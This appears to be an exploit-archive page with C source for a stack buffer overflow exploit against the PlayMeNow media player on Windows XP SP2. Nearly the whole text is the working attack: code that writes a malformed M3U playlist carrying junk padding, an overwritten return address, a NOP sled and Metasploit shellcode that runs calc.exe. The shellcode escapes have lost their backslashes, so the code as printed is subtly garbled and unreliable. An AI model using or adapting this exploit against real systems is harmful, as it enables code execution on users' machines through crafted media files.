PlayMeNow Malformed M3U Playlist BOF WinXP SP2 Fr

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PlayMeNow Malformed M3U Playlist BOF WinXP SP2 Fr
# Published : 2010-01-03
# Author : bibi-info
# Previous Title : Quick Player v1.2 Unicode BOF - bindshell
# Next Title : Quick Player v1.2 Unicode Buffer Overflow Exploit
/*==============================================================================
                      _      _       _          _      _   _
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|

==============================================================================*/




//Exploit Title: PlayMeNow Malformed M3U Playlist  BOF WinXP SP2 Fr
// Date: 03/01/2010
// Author: bibi-info
// Version: 7.4.0.0
// Tested on: Windows Xp sp2
// greetz : His0k4 & madjix & All friends & muslims HaCkers(dz)
// Logo : one two three viva l'Algerie :d



#include<stdio.h>
#include<string.h>
#include<stdlib.h>



/* win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com */
unsigned char scode[] =
                         "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
                         "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
                         "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
                         "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
                         "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
                         "x42x50x42x30x42x30x4bx38x45x34x4ex33x4bx58x4ex47"
                         "x45x30x4ax47x41x30x4fx4ex4bx58x4fx54x4ax41x4bx48"
                         "x4fx35x42x42x41x50x4bx4ex49x54x4bx48x46x43x4bx58"
                         "x41x30x50x4ex41x43x42x4cx49x59x4ex4ax46x38x42x4c"
                         "x46x47x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e"
                         "x46x4fx4bx53x46x55x46x42x46x50x45x47x45x4ex4bx58"
                         "x4fx35x46x32x41x50x4bx4ex48x46x4bx38x4ex30x4bx54"
                         "x4bx38x4fx45x4ex41x41x50x4bx4ex4bx38x4ex41x4bx38"
                         "x41x30x4bx4ex49x48x4ex35x46x52x46x30x43x4cx41x33"
                         "x42x4cx46x36x4bx48x42x34x42x43x45x38x42x4cx4ax37"
                         "x4ex50x4bx58x42x44x4ex50x4bx38x42x57x4ex41x4dx4a"
                         "x4bx58x4ax46x4ax30x4bx4ex49x30x4bx48x42x38x42x4b"
                         "x42x50x42x50x42x30x4bx58x4ax46x4ex43x4fx45x41x33"
                         "x48x4fx42x56x48x45x49x58x4ax4fx43x38x42x4cx4bx37"
                         "x42x35x4ax46x50x57x4ax4dx44x4ex43x47x4ax46x4ax39"
                         "x50x4fx4cx48x50x50x47x35x4fx4fx47x4ex43x36x41x36"
                         "x4ex36x43x46x42x50x5a";





int main ( int argc , char * argv[])

{

    FILE* fexp= NULL;
    char* EIP = "x31xAEx80x7C"; // 0x7C80AE31  kernel32.dll
    int i;


    printf("t. .. ... PlayMeNow Malformed M3U Playlist Stack buffer Overflow Exploit ... .. .rn");
    printf("t          -------> execute calc.exe <-------n");


    if( (fexp=fopen("test.m3u","wb")) ==NULL )
    {
         perror("cannot open exploit  file!!!");
         exit(0);
    }

                for (i=0; i<1040; i++)
                {
                    fwrite("x41", 1, 1, fexp);  // Junk
                }

                fwrite(EIP, 4, 1, fexp);  // ret

                for (i=0; i<50; i++)
                {
                    fwrite("x90", 1, 1, fexp);// Nops
                }

                fwrite(scode, sizeof(scode), 1, fexp);

                fclose(fexp);

                printf("[+] test.m3u Created successfully rn");
                printf("[+] Exploited By b!b!-!nfo from Algeria rn");


    return 0;

}